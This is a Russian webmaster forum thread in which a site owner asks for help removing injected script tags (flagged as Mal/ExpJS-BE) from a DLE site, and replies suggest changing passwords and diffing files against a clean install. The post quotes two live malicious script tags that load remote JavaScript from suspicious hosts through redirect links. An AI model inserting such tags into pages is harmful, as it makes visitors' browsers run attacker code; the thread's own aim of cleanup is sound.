Помогите найти вирус! Mal/ExpJS-BE

W
На сайте с 28.06.2012
Offline
19
610

Всем привет! Яндекс уведомил, что сайт может угрожать опасности, вердикт - Mal/ExpJS-BE. Вначале вредоносный код

<script src="//liveinternet.ru/click?joprtyyyer.gettrials.com/78673421.js"></script>

дописывался в баннерах (сайт на DLE), но когда я начал писать банеры в ручную без использования тегов типо {banner_header}, то код начал дописываться как-то через ajax

<script>(function(d, s, id) {

var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<script src="//li.ru/click?olllaooosq.wha.la/78673421.js"></script>
<div id="loading-layer" style="display:none">Загрузка. Пожалуйста, подождите...</div>

В шаблоне main.tpl это выглядит так

<script>(function(d, s, id) {

var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
{AJAX}

Как удалить этот вредоносный код? Сайт: _microsoftportal.net

R
На сайте с 24.01.2008
Offline
180
#1

Удалить код не проблема, необходимо выяснить как он появился и лечить.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
STMike
На сайте с 29.03.2010
Offline
147
#2

Поменять пароль от админки и FTP.

Потом взять программу WinMerge, скачать папку с сайтом и сравнить чистый дистрибутив движка и версию с сайта. Программа покажет измененные файлы, а их в свою очередь можно будет проверить вручную на наличие вредоносного кода.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий